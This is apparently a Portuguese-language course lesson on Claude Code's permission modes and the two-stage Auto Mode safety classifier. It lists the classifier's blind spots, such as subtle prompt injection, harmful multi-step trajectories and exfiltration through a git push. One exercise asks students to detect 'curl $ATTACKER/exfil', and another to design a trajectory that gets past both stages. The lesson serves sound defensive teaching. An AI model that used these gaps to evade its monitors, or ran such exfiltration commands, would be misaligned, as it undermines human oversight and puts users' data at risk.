Phase 15 - Lesson 10
Claude Code como um Agente Autônomo: Modos de Permissão e Auto Mode
O Claude Code expõe sete modos de permissão. "plan" pergunta antes de cada ação, "default" pergunta apenas para ações arriscadas, "acceptEdits" aprova automaticamente gravações de arquivos, mas ainda confirma a execução do shell, e "bypassPermissions" aprova tudo. O Auto Mode (24 de março de 2026) substitui a aprovação por ação por um classificador de segurança paralelo em duas etapas: uma verificação rápida de token único é executada em cada ação; ações sinalizadas iniciam uma revisão profunda de chain-of-thought. Orçamentos de ação são aplicados via
max_turnsemax_budget_usd. O Auto Mode foi lançado como um "research preview" (prévia de pesquisa) — a Anthropic declarou explicitamente que o classificador não é suficiente por si só.
Tipo: Aprender Idiomas: Python (stdlib, simulador de classificador em duas etapas) Pré-requisitos: Fase 15 · 01 (Agentes de longo horizonte), Fase 15 · 09 (Cenário de agentes de codificação) Tempo: ~45 minutos
O Problema
Um agente de codificação autônomo em sua máquina é uma categoria de segurança distinta. A superfície de ataque é tudo o que o agente pode alcançar — sistema de arquivos, rede, credenciais, área de transferência, qualquer aba do navegador, qualquer terminal aberto. Bruce Schneier e outros alertaram publicamente sobre isso: agentes de uso de computador não são uma "atualização de recurso" de chatbots, eles são um novo tipo de ferramenta com um novo tipo de perfil de risco.
O sistema de permissões do Claude Code é a resposta da Anthropic. Em vez de uma única chave de "autônomo / não autônomo", existem sete modos que abrangem uma escala de capacidade: plan → default → acceptEdits → … → bypassPermissions. Cada modo representa uma compensação diferente entre velocidade e revisão por ação. O Auto Mode (março de 2026) adiciona um classificador em duas etapas que remove a aprovação do caminho crítico do usuário para ações que o classificador julga seguras, ao mesmo tempo em que preserva uma camada de revisão para ações que o classificador sinaliza.
A questão de engenharia: o que esse sistema detecta, o que ele deixa passar e qual modo uma determinada tarefa realmente exige?
O Conceito
Os sete modos de permissão
| Modo | Comportamento | Quando usar |
|---|---|---|
plan |
O agente propõe um plano; o usuário aprova todo o plano; cada ação é revisada antes da execução | Tarefa desconhecida; código próximo a produção; primeira vez usando o agente em um repositório |
default |
O agente executa ações; solicita confirmação do usuário para qualquer ação "arriscada" (execução de shell, operações destrutivas, chamadas de rede) | A maioria das sessões de codificação interativas |
acceptEdits |
Gravações de arquivos são aprovadas automaticamente; execução de shell e chamadas de rede ainda exigem confirmação | Etapa de refatoração em muitos arquivos |
acceptExec |
Comandos de shell são aprovados automaticamente dentro de uma lista de permissões selecionada; gravações de arquivos são aprovadas automaticamente | Loops internos curtos onde cada comando de shell é npm test ou similar |
autoMode |
Classificador de segurança em duas etapas; ações sinalizadas são enviadas para revisão | Execuções autônomas de longo horizonte em um espaço de trabalho restrito |
yolo |
Ignora a maioria das confirmações; ainda executa a lista de permissões/bloqueio de ferramentas | Sandboxes efêmeros, trabalhos de CI, scripts de pesquisa |
bypassPermissions |
Aprova tudo | Documentado como "apenas dentro de contêineres efêmeros que você está disposto a descartar" |
(Os nomes acima correspondem aos documentos públicos do Claude Code; "yolo" é a abreviação informal para o meio-termo permissivo.)
Auto Mode em uma página
O Auto Mode (lançado em 24 de março de 2026) é o primeiro modo de permissão a delegar a aprovação por ação a um modelo. Estrutura:
- Etapa 1 — classificador de token único. É executado em cada ação proposta. Barato. Retorna "safe" (seguro) ou "flag" (sinalizar). Projetado para rodar em paralelo com o loop principal do agente para que as ações aprovadas não fiquem presas em uma fila.
- Etapa 2 — revisão secundária de política/segurança. É executada apenas em ações sinalizadas. Realiza uma avaliação focada de política e segurança sobre a ação, o estado atual da sessão e a tarefa declarada. Encaminha para o usuário (HITL - Human-in-the-Loop) se a confiança for baixa.
Os controles de orçamento ficam ao lado do classificador:
max_turns— total de iterações em uma sessão.max_budget_usd— limite em dólares que aborta a sessão.- limites de contagem de ações por ferramenta (não mais que N chamadas
WebFetch, etc.).
O que o sistema detecta
- Injeção de prompt direta em entradas de ferramentas onde a instrução injetada corresponde a um formato de ação conhecido como arriscado.
- Loops de ferramentas repetitivos — o classificador pode ver que a ação N+1 é quase idêntica à ação N, cinco vezes seguidas.
- Comandos de shell claramente fora do escopo em uma sessão que de outra forma seria apenas de edição de arquivos.
O que o sistema pode deixar passar
- Injeção de prompt sutil que modula o comportamento sem produzir nenhuma ação sinalizada. A injeção de prompt indireta não é uma vulnerabilidade totalmente corrigível (diretor de preparação da OpenAI, 2025, sobre agentes de navegador — veja a Lição 11).
- Comportamento inadequado em nível semântico. Cada ação individual pode parecer segura enquanto a trajetória composta é prejudicial. O classificador julga a ação; ele não deduz novamente a intenção do usuário.
- Exfiltração por meio de canais legítimos. Escrever dados em um arquivo que você possui e, em seguida, fazer um
git pushpara um repositório público é uma sequência de ações permitidas cuja composição é o problema.
Enquadramento como prévia de pesquisa (Research Preview)
A Anthropic lançou o Auto Mode como uma prévia de pesquisa (research preview). A documentação é explícita ao afirmar que o classificador é uma camada, não uma solução: espera-se que os usuários combinem o Auto Mode com orçamentos, listas de permissões, espaços de trabalho isolados e auditorias de trajetória (Lições 12–16). O enquadramento como prévia de pesquisa também reflete a lacuna documentada entre avaliação e implantação (Lição 1) — um classificador que passa em avaliações offline pode se comportar de maneira diferente em uma sessão real onde o contexto do usuário é ambíguo.
Onde essa escala se encaixa no seu fluxo de trabalho
- Tarefa desconhecida: comece em
plan. Ler o plano é mais barato do que reverter uma execução ruim. - Refatoração conhecida:
acceptEditseconomiza muitos cliques de confirmação. - Execução em segundo plano sem supervisão:
autoModeapenas dentro de um espaço de trabalho cujo raio de impacto você tenha medido (sem credenciais, sem montagens de produção, sem saída de dados que você não tenha autorizado expressamente). - Contêineres efêmeros:
yolo/bypassPermissionsis aceitável se, e somente se, o contêiner e suas credenciais forem descartáveis.
Use
code/main.py simula o classificador de duas etapas. A Etapa 1 é uma regra de palavra-chave barata sobre as ações propostas; a Etapa 2 é um revisor de múltiplas regras mais lento. O executor insere uma trajetória sintética curta (ações seguras, uma tentativa de injeção de prompt, um loop repetitivo) e mostra onde o classificador detecta e onde ele falha.
Envie
outputs/skill-permission-mode-picker.md associa a descrição de uma tarefa ao modo de permissão correto, limites de orçamento e isolamento necessário.
Exercícios
Execute
code/main.py. Qual tipo de ação sintética nunca é sinalizado pela Etapa 1, mas é sempre detectado pela Etapa 2? Qual não é detectado por nenhuma delas?Estenda o conjunto de regras da Etapa 1 para detectar um formato específico conhecido como malicioso (por exemplo,
curl $ATTACKER/exfil). Meça a taxa de falsos positivos na amostra de ações benignas.Leia o documento "How the agent loop works" da Anthropic. Liste cada estado externo que o agente toca por padrão no modo
default. Quais você precisaria controlar separadamente antes de executar oautoModesem supervisão?Projete um orçamento para execução sem supervisão de 24 horas:
max_turns,max_budget_usd, limites por ferramenta, listas de permissões. Justifique cada número.Descreva uma trajetória onde cada ação individual é aprovada pela Etapa 1 e pela Etapa 2, mas o comportamento composto é desalinhado. (A Lição 14 aborda como botões de emergência e tokens canário lidam com isso.)
Termos-Chave
| Termo | O que as pessoas dizem | O que realmente significa |
|---|---|---|
| Modo de permissão | "O quanto o agente pode fazer" | Uma das sete políticas nomeadas que controlam a aprovação por ação |
| Modo plan | "Perguntar antes de qualquer coisa" | O agente escreve um plano; o usuário aprova antes da execução |
| acceptEdits | "Deixar que ele escreva arquivos" | Gravações de arquivos são aprovadas automaticamente; a execução de shell ainda solicita confirmação |
| autoMode | "Aprovações automáticas" | Classificador de segurança em duas etapas; ações sinalizadas são escaladas |
| bypassPermissions | "YOLO total" | Aprova tudo; destinado a contêineres efêmeros |
| Classificador da Etapa 1 | "Verificação rápida de token" | Regra de token único sobre a ação proposta; roda em paralelo |
| Classificador da Etapa 2 | "Revisão profunda" | Raciocínio chain-of-thought sobre ações sinalizadas |
| Research preview | "Não disponível de forma geral (GA)" | Enquadramento da Anthropic para recursos cujos modos de falha ainda estão sendo mapeados |
Leitura Adicional
- Anthropic — How the agent loop works — modos de permissão, orçamentos, formato de ação.
- Anthropic — Claude Managed Agents overview — modelo de execução de serviço gerenciado.
- Anthropic — Claude Code product page — superfície de recursos e anúncio do Auto Mode.
- Anthropic — Claude's Constitution (January 2026) — a camada baseada em regras/razão que molda os julgamentos do classificador.
- Anthropic — Measuring agent autonomy in practice — perspectiva interna sobre o design de permissões de longo horizonte.